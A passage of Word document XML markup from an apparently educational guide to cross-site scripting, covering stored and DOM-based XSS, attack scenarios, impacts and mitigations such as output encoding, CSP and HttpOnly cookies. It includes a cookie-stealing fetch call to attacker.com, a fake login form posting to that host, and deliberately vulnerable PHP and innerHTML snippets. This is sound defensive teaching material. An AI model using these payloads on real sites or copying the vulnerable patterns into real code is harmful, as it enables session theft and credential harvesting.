              <w:t xml:space="preserve">Mechanism: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="555F5E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Attacker submits malicious payload → application stores it unsanitized in the database → all subsequent visitors load and execute the malicious script automatically.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="40"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C2B2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Impact: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="555F5E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Widespread user compromise, session hijacking, data theft, defacement, malware distribution. No individual phishing required — all page visitors are affected.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="555F5E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Example — Stored comment injection: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 Vulnerable code --&gt;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&lt;div&gt;User comment: &lt;?php echo $comment; ?&gt;&lt;/div&gt;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 Stored payload renders as --&gt;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&lt;div&gt;User comment: &lt;script&gt;alert('Hacked')&lt;/script&gt;&lt;/div&gt;</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E8E1" w:sz="1"/>
              <w:left w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:right w:val="single" w:color="D0E8E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="DDF1E9" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="100"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="100"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C2B2A"/>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
              </w:rPr>
              <w:t xml:space="preserve">Type 3: DOM-Based XSS (Client-Side)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="60"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="555F5E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">DOM-Based XSS is a client-side vulnerability where the malicious payload manipulates the Document Object Model entirely in the browser — no server-side reflection is needed. The attack arises from insecure JavaScript that processes user-controlled input (e.g., URL fragments) and writes it directly to the DOM.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="60"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C2B2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Mechanism: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="555F5E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Attacker crafts URL with malicious hash/query → browser's vulnerable JavaScript reads and injects the value into the DOM → script executes client-side only, leaving no server-side trace.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="40"/>
            </w:pPr>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C2B2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Impact: </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="555F5E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Session theft, phishing, unauthorized actions. Particularly dangerous as the payload does not appear in server logs, evading traditional detection.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="555F5E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Example — DOM manipulation vulnerability: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&lt;script&gt;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let query = window.location.search.substring(1);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document.getElementById('output').innerHTML = query;  // UNSAFE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&lt;/script&gt;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&lt;div id='output'&gt;&lt;/div&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1C2B2A"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Common Attack Scenarios</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Session Hijacking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="555F5E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The most common XSS exploit: a malicious script reads the victim's session cookie and transmits it to an attacker-controlled server, enabling session impersonation.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&lt;script&gt;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fetch('http://attacker.com/steal?cookie=' + document.cookie);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&lt;/script&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Credential Phishing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="555F5E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">An attacker injects a convincing fake login form into the trusted page. Unsuspecting users submit their credentials directly to the attacker's server.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&lt;form action='http://attacker.com/steal'&gt;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&lt;input type='text' name='username' placeholder='Username'&gt;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&lt;input type='password' name='password' placeholder='Password'&gt;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&lt;input type='submit' value='Login'&gt;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&lt;/form&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Website Defacement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="555F5E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Scripts or raw HTML are injected to visually alter the website, typically for reputational damage or as a demonstration of compromise. Example: injection of a large banner element replacing legitimate page content.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Malware Distribution</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="555F5E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The victim's browser is silently redirected to a malicious site that may deliver drive-by downloads or further exploitation. Example: window.location redirection via injected script tag.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1C2B2A"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Impact Assessment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E8E1" w:sz="1"/>
              <w:left w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:right w:val="single" w:color="D0E8E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A7A5E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Impact Area</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:left w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:right w:val="single" w:color="D0E8E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="1A7A5E" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Consequences</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:left w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:right w:val="single" w:color="D0E8E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8F5F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C2B2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">User Compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:left w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:right w:val="single" w:color="D0E8E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8F5F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="555F5E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Session cookie theft, credential harvesting, account impersonation, unauthorized transactions on behalf of victim.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:left w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:right w:val="single" w:color="D0E8E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C2B2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Application Integrity</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:left w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:right w:val="single" w:color="D0E8E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="555F5E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Website defacement, injection of malicious content, delivery of malware or phishing pages to all users.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:left w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:right w:val="single" w:color="D0E8E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8F5F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C2B2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Business &amp; Legal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:left w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:right w:val="single" w:color="D0E8E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="E8F5F1" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="555F5E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Loss of customer trust, regulatory fines (GDPR/HIPAA violations), incident response costs, reputational damage.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:left w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:right w:val="single" w:color="D0E8E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="1C2B2A"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Broader Threat Surface</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:left w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:bottom w:val="single" w:color="D0E8E1" w:sz="1"/>
              <w:right w:val="single" w:color="D0E8E1" w:sz="1"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="160"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="555F5E"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">XSS can chain into CSRF, admin account takeover, privilege escalation, or serve as an entry point for larger breaches.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="160"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="1A7A5E" w:sz="6" w:space="4"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1C2B2A"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Mitigation Strategies</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80" w:before="80" w:line="276"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="555F5E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Preventing XSS requires a defence-in-depth approach. No single control is sufficient; the following layers should be applied in combination.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">1. Input Validation &amp; Sanitization</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Validate all user input against strict allowlists (acceptable formats, lengths, character sets).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Sanitize input to strip or neutralize dangerous characters before storing or processing.</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Use trusted libraries: DOMPurify (JavaScript client-side) or HTMLSanitizer (server-side).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Output Encoding</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HTML Context: Encode &lt;, &gt;, &amp;, " to &amp;lt;, &amp;gt;, &amp;amp;, &amp;quot;</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JavaScript Context: Escape quotes and special characters; never inject raw user data into script blocks.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URL Context: Apply encodeURIComponent() before embedding user values in URLs.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CSS Context: Avoid dynamic CSS values; if necessary, use strict sanitization.</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 PHP — safe output encoding --&gt;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&lt;p&gt;Search: &lt;?php echo htmlspecialchars($_GET['query'], ENT_QUOTES, 'UTF-8'); ?&gt;&lt;/p&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Use Secure Frameworks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Prefer frameworks with automatic output escaping: React (JSX), Angular, Vue.js.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Avoid direct DOM manipulation via innerHTML or document.write(); use textContent instead.</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Never pass raw user data to eval(), setTimeout(string), or new Function().</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Content Security Policy (CSP)</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Deploy a strict CSP header to whitelist trusted script sources and block inline script execution.</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Use nonces or hashes to selectively permit necessary inline scripts.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Content-Security-Policy: default-src 'self'; script-src 'self' trusted.com; object-src 'none';</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:cs="Georgia" w:eastAsia="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1A7A5E"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">5. HTTP-Only &amp; Secure Cookies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Mark session cookies as HttpOnly to block JavaScript access via document.cookie.</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Add the Secure flag to enforce HTTPS-only transmission of cookies.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Set-Cookie: sessionid=abc123; HttpOnly; Secure; SameSite=Strict</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
